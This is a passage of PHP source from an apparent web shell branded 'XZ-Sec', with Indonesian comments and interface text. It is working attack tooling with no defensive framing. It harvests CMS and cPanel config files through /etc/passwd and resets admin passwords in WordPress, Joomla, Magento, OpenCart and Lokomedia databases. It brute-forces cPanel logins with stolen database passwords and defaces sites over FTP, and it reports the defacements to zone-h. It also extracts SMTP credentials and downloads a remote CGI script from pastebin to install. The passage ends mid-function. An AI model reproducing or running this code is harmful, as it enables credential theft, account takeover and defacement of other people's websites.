554. if($passwd == "" || !$etc) {
555. echo "<font color=red>Can't read /etc/passwd</font>";
556. } else {
557. preg_match_all('/(.*?):x:/', $passwd, $user_config);
558. foreach($user_config[1] as $user_idx) {
559. $user_config_dir = "/home/$user_idx/public_html/";
560. if(is_readable($user_config_dir)) {
561. $grab_config = array(
562. "/home/$user_idx/.my.cnf" => "cpanel",
563. "/home/$user_idx/.accesshash" => "WHM-accesshash",
564. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
565. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
566. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
567. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
568. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
569. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
570. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
571. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
572. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
573. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
574. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
575. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
576. "/home/$user_idx/public_html/configuration.php" => "Joomla",
577. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
578. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
579. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
580. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
581. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
582. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
583. foreach($grab_config as $config => $nama_config) {
584. $ambil_config = file_get_contents($config);
585. if($ambil_config == '') {
586. } else {
587. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
588. fputs($file_config,$ambil_config);
589. }
590. }
591. }
592. }
593. }
594. }
595. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
596. } elseif($_GET['do'] == 'jumping') {
597. $i = 0;
598. echo "<pre><div class='margin: 5px auto;'>";
599. $etc = fopen("/etc/passwd", "r");
600. while($passwd = fgets($etc)) {
601. if($passwd == '' || !$etc) {
602. echo "<font color=red>Can't read /etc/passwd</font>";
603. } else {
604. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
605. foreach($user_jumping[1] as $user_idx_jump) {
606. $user_jumping_dir = "/home/$user_idx_jump/public_html";
607. if(is_readable($user_jumping_dir)) {
608. $i++;
609. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
610. if(is_writable($user_jumping_dir)) {
611. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
612. }
613. echo $jrw;
614. if(function_exists('posix_getpwuid')) {
615. $domain_jump = file_get_contents("/etc/named.conf");
616. if($domain_jump == '') {
617. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
618. } else {
619. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
620. foreach($domains_jump[1] as $dj) {
621. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
622. $user_jumping_url = $user_jumping_url['name'];
623. if($user_jumping_url == $user_idx_jump) {
624. echo " => ( <u>$dj</u> )<br>";
625. break;
626. }
627. }
628. }
629. } else {
630. echo "<br>";
631. }
632. }
633. }
634. }
635. }
636. if($i == 0) {
637. } else {
638. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
639. }
640. echo "</div></pre>";
641. } elseif($_GET['do'] == 'auto_edit_user') {
642. if($_POST['hajar']) {
643. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
644. echo "username atau password harus lebih dari 6 karakter";
645. } else {
646. $user_baru = $_POST['user_baru'];
647. $pass_baru = md5($_POST['pass_baru']);
648. $conf = $_POST['config_dir'];
649. $scan_conf = scandir($conf);
650. foreach($scan_conf as $file_conf) {
651. if(!is_file("$conf/$file_conf")) continue;
652. $config = file_get_contents("$conf/$file_conf");
653. if(preg_match("/JConfig|joomla/",$config)) {
654. $dbhost = ambilkata($config,"host = '","'");
655. $dbuser = ambilkata($config,"user = '","'");
656. $dbpass = ambilkata($config,"password = '","'");
657. $dbname = ambilkata($config,"db = '","'");
658. $dbprefix = ambilkata($config,"dbprefix = '","'");
659. $prefix = $dbprefix."users";
660. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
661. $db = mysql_select_db($dbname);
662. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
663. $result = mysql_fetch_array($q);
664. $id = $result['id'];
665. $site = ambilkata($config,"sitename = '","'");
666. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
667. echo "Config => ".$file_conf."<br>";
668. echo "CMS => Joomla<br>";
669. if($site == '') {
670. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
671. } else {
672. echo "Sitename => $site<br>";
673. }
674. if(!$update OR !$conn OR !$db) {
675. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
676. } else {
677. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
678. }
679. mysql_close($conn);
680. } elseif(preg_match("/WordPress/",$config)) {
681. $dbhost = ambilkata($config,"DB_HOST', '","'");
682. $dbuser = ambilkata($config,"DB_USER', '","'");
683. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
684. $dbname = ambilkata($config,"DB_NAME', '","'");
685. $dbprefix = ambilkata($config,"table_prefix = '","'");
686. $prefix = $dbprefix."users";
687. $option = $dbprefix."options";
688. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
689. $db = mysql_select_db($dbname);
690. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
691. $result = mysql_fetch_array($q);
692. $id = $result[ID];
693. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
694. $result2 = mysql_fetch_array($q2);
695. $target = $result2[option_value];
696. if($target == '') {
697. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
698. } else {
699. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
700. }
701. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
702. echo "Config => ".$file_conf."<br>";
703. echo "CMS => Wordpress<br>";
704. echo $url_target;
705. if(!$update OR !$conn OR !$db) {
706. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
707. } else {
708. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
709. }
710. mysql_close($conn);
711. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
712. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
713. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
714. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
715. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
716. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
717. $prefix = $dbprefix."admin_user";
718. $option = $dbprefix."core_config_data";
719. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
720. $db = mysql_select_db($dbname);
721. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
722. $result = mysql_fetch_array($q);
723. $id = $result[user_id];
724. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
725. $result2 = mysql_fetch_array($q2);
726. $target = $result2[value];
727. if($target == '') {
728. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
729. } else {
730. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
731. }
732. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
733. echo "Config => ".$file_conf."<br>";
734. echo "CMS => Magento<br>";
735. echo $url_target;
736. if(!$update OR !$conn OR !$db) {
737. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
738. } else {
739. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
740. }
741. mysql_close($conn);
742. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
743. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
744. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
745. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
746. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
747. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
748. $prefix = $dbprefix."user";
749. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
750. $db = mysql_select_db($dbname);
751. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
752. $result = mysql_fetch_array($q);
753. $id = $result[user_id];
754. $target = ambilkata($config,"HTTP_SERVER', '","'");
755. if($target == '') {
756. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
757. } else {
758. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
759. }
760. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
761. echo "Config => ".$file_conf."<br>";
762. echo "CMS => OpenCart<br>";
763. echo $url_target;
764. if(!$update OR !$conn OR !$db) {
765. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
766. } else {
767. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
768. }
769. mysql_close($conn);
770. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
771. $dbhost = ambilkata($config,'server = "','"');
772. $dbuser = ambilkata($config,'username = "','"');
773. $dbpass = ambilkata($config,'password = "','"');
774. $dbname = ambilkata($config,'database = "','"');
775. $prefix = "users";
776. $option = "identitas";
777. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
778. $db = mysql_select_db($dbname);
779. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
780. $result = mysql_fetch_array($q);
781. $target = $result[alamat_website];
782. if($target == '') {
783. $target2 = $result[url];
784. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
785. if($target2 == '') {
786. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
787. } else {
788. $cek_login3 = file_get_contents("$target2/adminweb/");
789. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
790. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
791. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
792. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
793. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
794. } else {
795. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
796. }
797. }
798. } else {
799. $cek_login = file_get_contents("$target/adminweb/");
800. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
801. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
802. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
803. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
804. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
805. } else {
806. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
807. }
808. }
809. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
810. echo "Config => ".$file_conf."<br>";
811. echo "CMS => Lokomedia<br>";
812. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
813. echo $url_target2;
814. } else {
815. echo $url_target;
816. }
817. if(!$update OR !$conn OR !$db) {
818. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
819. } else {
820. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
821. }
822. mysql_close($conn);
823. }
824. }
825. }
826. } else {
827. echo "<center>
828. <h1>Auto Edit User Config</h1>
829. <form method='post'>
830. DIR Config: <br>
831. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
832. Set User & Pass: <br>
833. <input type='text' name='user_baru' value='noname110' placeholder='user_baru'><br>
834. <input type='text' name='pass_baru' value='noname110' placeholder='pass_baru'><br>
835. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
836. </form>
837. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
838. ";
839. }
840. } elseif($_GET['do'] == 'cpanel') {
841. if($_POST['crack']) {
842. $usercp = explode("\r\n", $_POST['user_cp']);
843. $passcp = explode("\r\n", $_POST['pass_cp']);
844. $i = 0;
845. foreach($usercp as $ucp) {
846. foreach($passcp as $pcp) {
847. if(@mysql_connect('localhost', $ucp, $pcp)) {
848. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
849. } else {
850. $_SESSION[$ucp] = "1";
851. $_SESSION[$pcp] = "1";
852. if($ucp == '' || $pcp == '') {
853.  
854. } else {
855. $i++;
856. if(function_exists('posix_getpwuid')) {
857. $domain_cp = file_get_contents("/etc/named.conf");
858. if($domain_cp == '') {
859. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
860. } else {
861. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
862. foreach($domains_cp[1] as $dj) {
863. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
864. $user_cp_url = $user_cp_url['name'];
865. if($user_cp_url == $ucp) {
866. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
867. break;
868. }
869. }
870. }
871. } else {
872. $dom = "<font color=red>function is Disable by system</font>";
873. }
874. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
875. }
876. }
877. }
878. }
879. }
880. if($i == 0) {
881. } else {
882. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>N00B.</font>";
883. }
884. } else {
885. echo "<center>
886. <form method='post'>
887. USER: <br>
888. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
889. $_usercp = fopen("/etc/passwd","r");
890. while($getu = fgets($_usercp)) {
891. if($getu == '' || !$_usercp) {
892. echo "<font color=red>Can't read /etc/passwd</font>";
893. } else {
894. preg_match_all("/(.*?):x:/", $getu, $u);
895. foreach($u[1] as $user_cp) {
896. if(is_dir("/home/$user_cp/public_html")) {
897. echo "$user_cp\n";
898. }
899. }
900. }
901. }
902. echo "</textarea><br>
903. PASS: <br>
904. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
905. function cp_pass($dir) {
906. $pass = "";
907. $dira = scandir($dir);
908. foreach($dira as $dirb) {
909. if(!is_file("$dir/$dirb")) continue;
910. $ambil = file_get_contents("$dir/$dirb");
911. if(preg_match("/WordPress/", $ambil)) {
912. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
913. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
914. $pass .= ambilkata($ambil,"password = '","'")."\n";
915. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
916. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
917. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
918. $pass .= ambilkata($ambil,'password = "','"')."\n";
919. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
920. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
921. } elseif(preg_match("/client/", $ambil)) {
922. preg_match("/password=(.*)/", $ambil, $pass1);
923. if(preg_match('/"/', $pass1[1])) {
924. $pass1[1] = str_replace('"', "", $pass1[1]);
925. $pass .= $pass1[1]."\n";
926. }
927. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
928. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
929. }
930. }
931. echo $pass;
932. }
933. $cp_pass = cp_pass($dir);
934. echo $cp_pass;
935. echo "</textarea><br>
936. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
937. </form>
938. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
939. }
940. } elseif($_GET['do'] == 'cpftp_auto') {
941. if($_POST['crack']) {
942. $usercp = explode("\r\n", $_POST['user_cp']);
943. $passcp = explode("\r\n", $_POST['pass_cp']);
944. $i = 0;
945. foreach($usercp as $ucp) {
946. foreach($passcp as $pcp) {
947. if(@mysql_connect('localhost', $ucp, $pcp)) {
948. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
949. } else {
950. $_SESSION[$ucp] = "1";
951. $_SESSION[$pcp] = "1";
952. if($ucp == '' || $pcp == '') {
953. //
954. } else {
955. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
956. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
957. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
958. if((!$ftp_login) || (!$ftp_conn)) {
959. echo "[+] <font color=red>Login Gagal</font><br><br>";
960. } else {
961. echo "[+] <font color=lime>Login Sukses</font><br>";
962. $fi = htmlspecialchars($_POST['file_deface']);
963. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
964. if($deface) {
965. $i++;
966. echo "[+] <font color=lime>Deface Sukses</font><br>";
967. if(function_exists('posix_getpwuid')) {
968. $domain_cp = file_get_contents("/etc/named.conf");
969. if($domain_cp == '') {
970. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
971. } else {
972. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
973. foreach($domains_cp[1] as $dj) {
974. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
975. $user_cp_url = $user_cp_url['name'];
976. if($user_cp_url == $ucp) {
977. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
978. break;
979. }
980. }
981. }
982. } else {
983. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
984. }
985. } else {
986. echo "[-] <font color=red>Deface Gagal</font><br><br>";
987. }
988. }
989. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
990. }
991. }
992. }
993. }
994. }
995. if($i == 0) {
996. } else {
997. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>N00B.</font>";
998. }
999. } else {
1000. echo "<center>
1001. <form method='post'>
1002. Filename: <br>
1003. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1004. Deface Page: <br>
1005. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
1006. USER: <br>
1007. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1008. $_usercp = fopen("/etc/passwd","r");
1009. while($getu = fgets($_usercp)) {
1010. if($getu == '' || !$_usercp) {
1011. echo "<font color=red>Can't read /etc/passwd</font>";
1012. } else {
1013. preg_match_all("/(.*?):x:/", $getu, $u);
1014. foreach($u[1] as $user_cp) {
1015. if(is_dir("/home/$user_cp/public_html")) {
1016. echo "$user_cp\n";
1017. }
1018. }
1019. }
1020. }
1021. echo "</textarea><br>
1022. PASS: <br>
1023. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1024. function cp_pass($dir) {
1025. $pass = "";
1026. $dira = scandir($dir);
1027. foreach($dira as $dirb) {
1028. if(!is_file("$dir/$dirb")) continue;
1029. $ambil = file_get_contents("$dir/$dirb");
1030. if(preg_match("/WordPress/", $ambil)) {
1031. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1032. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1033. $pass .= ambilkata($ambil,"password = '","'")."\n";
1034. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1035. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1036. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1037. $pass .= ambilkata($ambil,'password = "','"')."\n";
1038. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1039. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1040. } elseif(preg_match("/client/", $ambil)) {
1041. preg_match("/password=(.*)/", $ambil, $pass1);
1042. if(preg_match('/"/', $pass1[1])) {
1043. $pass1[1] = str_replace('"', "", $pass1[1]);
1044. $pass .= $pass1[1]."\n";
1045. }
1046. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1047. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1048. }
1049. }
1050. echo $pass;
1051. }
1052. $cp_pass = cp_pass($dir);
1053. echo $cp_pass;
1054. echo "</textarea><br>
1055. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1056. </form>
1057. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1058. }
1059. } elseif($_GET['do'] == 'smtp') {
1060. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1061. function scj($dir) {
1062. $dira = scandir($dir);
1063. foreach($dira as $dirb) {
1064. if(!is_file("$dir/$dirb")) continue;
1065. $ambil = file_get_contents("$dir/$dirb");
1066. $ambil = str_replace("$", "", $ambil);
1067. if(preg_match("/JConfig|joomla/", $ambil)) {
1068. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1069. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1070. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1071. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1072. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1073. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1074. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1075. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1076. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1077. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1078. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1079. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1080. }
1081. }
1082. }
1083. $smpt_hunter = scj($dir);
1084. echo $smpt_hunter;
1085. } elseif($_GET['do'] == 'auto_wp') {
1086. if($_POST['hajar']) {
1087. $title = htmlspecialchars($_POST['new_title']);
1088. $pn_title = str_replace(" ", "-", $title);
1089. if($_POST['cek_edit'] == "Y") {
1090. $script = $_POST['edit_content'];
1091. } else {
1092. $script = $title;
1093. }
1094. $conf = $_POST['config_dir'];
1095. $scan_conf = scandir($conf);
1096. foreach($scan_conf as $file_conf) {
1097. if(!is_file("$conf/$file_conf")) continue;
1098. $config = file_get_contents("$conf/$file_conf");
1099. if(preg_match("/WordPress/", $config)) {
1100. $dbhost = ambilkata($config,"DB_HOST', '","'");
1101. $dbuser = ambilkata($config,"DB_USER', '","'");
1102. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1103. $dbname = ambilkata($config,"DB_NAME', '","'");
1104. $dbprefix = ambilkata($config,"table_prefix = '","'");
1105. $prefix = $dbprefix."posts";
1106. $option = $dbprefix."options";
1107. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1108. $db = mysql_select_db($dbname);
1109. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1110. $result = mysql_fetch_array($q);
1111. $id = $result[ID];
1112. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1113. $result2 = mysql_fetch_array($q2);
1114. $target = $result2[option_value];
1115. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1116. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1117. echo "<div style='margin: 5px auto;'>";
1118. if($target == '') {
1119. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1120. } else {
1121. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1122. }
1123. if(!$update OR !$conn OR !$db) {
1124. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1125. } else {
1126. echo "<font color=lime>sukses di ganti.</font><br>";
1127. }
1128. echo "</div>";
1129. mysql_close($conn);
1130. }
1131. }
1132. } else {
1133. echo "<center>
1134. <h1>Auto Edit Title+Content WordPress</h1>
1135. <form method='post'>
1136. DIR Config: <br>
1137. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1138. Set Title: <br>
1139. <input type='text' name='new_title' value='Hacked By XZ-Sec' placeholder='New Title'><br><br>
1140. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1141. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1142. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1143. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1144. </form>
1145. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1146. ";
1147. }
1148. } elseif($_GET['do'] == 'zoneh') {
1149. if($_POST['submit']) {
1150. $domain = explode("\r\n", $_POST['url']);
1151. $nick = $_POST['nick'];
1152. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1153. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1154. function zoneh($url,$nick) {
1155. $ch = curl_init("http://www.zone-h.com/notify/single");
1156. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1157. curl_setopt($ch, CURLOPT_POST, true);
1158. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1159. return curl_exec($ch);
1160. curl_close($ch);
1161. }
1162. foreach($domain as $url) {
1163. $zoneh = zoneh($url,$nick);
1164. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1165. echo "$url -> <font color=lime>OK</font><br>";
1166. } else {
1167. echo "$url -> <font color=red>ERROR</font><br>";
1168. }
1169. }
1170. } else {
1171. echo "<center><form method='post'>
1172. <u>Defacer</u>: <br>
1173. <input type='text' name='nick' size='50' value='XZ-Sec'><br>
1174. <u>Domains</u>: <br>
1175. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1176. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1177. </form>";
1178. }
1179. echo "</center>";
1180. } elseif($_GET['do'] == 'cgi') {
1181. $cgi_dir = mkdir('idx_cgi', 0755);
1182. $file_cgi = "idx_cgi/cgi.izo";
1183. $isi_htcgi = "AddHandler cgi-script .izo";
1184. $htcgi = fopen(".htaccess", "w");
1185. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1186. $cgi = fopen($file_cgi, "w");
1187. fwrite($cgi, $cgi_script);
1188. fwrite($htcgi, $isi_htcgi);
1189. chmod($file_cgi, 0755);
1190. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1191. } elseif($_GET['do'] == 'fake_root') {
1192. ob_start();
1193. function reverse($url) {
1194. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
1195. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1196. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
1197. curl_setopt($ch, CURLOPT_HEADER, 0);
1198. curl_setopt($ch, CURLOPT_POST, 1);
1199. $resp = curl_exec($ch);
1200. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
1201. $array = explode(",,", $resp);
1202. unset($array[0]);
1203. foreach($array as $lnk) {
1204. $lnk = "http://$lnk";
1205. $lnk = str_replace(",", "", $lnk);
1206. echo $lnk."\n";
1207. ob_flush();
1208. flush();
1209. }
1210. curl_close($ch);
1211. }
1212. function cek($url) {
1213. $ch = curl_init($url);
1214. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1215. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1216. $resp = curl_exec($ch);
1217. return $resp;
1218. }
1219. $cwd = getcwd();
1220. $ambil_user = explode("/", $cwd);
1221. $user = $ambil_user[2];
1222. if($_POST['reverse']) {
1223. $site = explode("\r\n", $_POST['url']);
1224. $file = $_POST['file'];
1225. foreach($site as $url) {
